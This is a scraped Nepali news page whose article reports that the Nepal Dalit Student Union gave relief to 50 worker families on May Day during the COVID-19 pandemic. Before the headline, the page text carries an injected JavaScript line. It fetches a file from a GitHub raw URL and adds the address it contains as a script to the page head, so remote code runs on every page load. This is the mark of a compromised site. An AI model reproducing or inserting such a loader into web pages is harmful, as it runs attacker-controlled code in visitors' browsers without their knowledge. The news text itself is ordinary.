;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); नेपाल दलित विद्यार्थी संघले ५० मजदुर परिवारलाई राहात दिएर मनायो मजदुर दिवस – जुनेली न्युज
मङ्लबार, असार १८, २०८२
  • होमपेज
  • नेपाल दलित विद्यार्थी संघले ५० मजदुर परिवारलाई राहात दिएर मनायो मजदुर दिवस
समाचार

नेपाल दलित विद्यार्थी संघले ५० मजदुर परिवारलाई राहात दिएर मनायो मजदुर दिवस

बैशाख १९,
काठमाडौँ | कोरोना भाईरसको चरम महामारीमा अत्यन्तै पीडित भईरहेकाहरुलाई बिश्वो मजदुर दिवसको अबसरमा  नेपाल दलित विद्यार्थी संघको विशेष समन्वय भूमिकामा काठमाडौँ का विभिन्न स्थानका ५० जना मजदुर तथा विपन्नहरु परिवारलाई राहत वितरण गरेको छ।
अध्यक्ष राजु सुनार भन्छन मजदुर दिवस मुखले बोलेर होइन अब मजदुरहरूको हितमा काम गरेरै मनाउनुपर्छ।
यस भन्दा अगाडी पनि संघले गोकर्नेश्वोर काठमाडौँ जिल्लाका बिभिन्न स्थानमा गरि करिब १५०० जना भन्दा बढीलाई राहात वितरण गरि सकेको छ |

फेसबुक प्रतिक्रियाहरु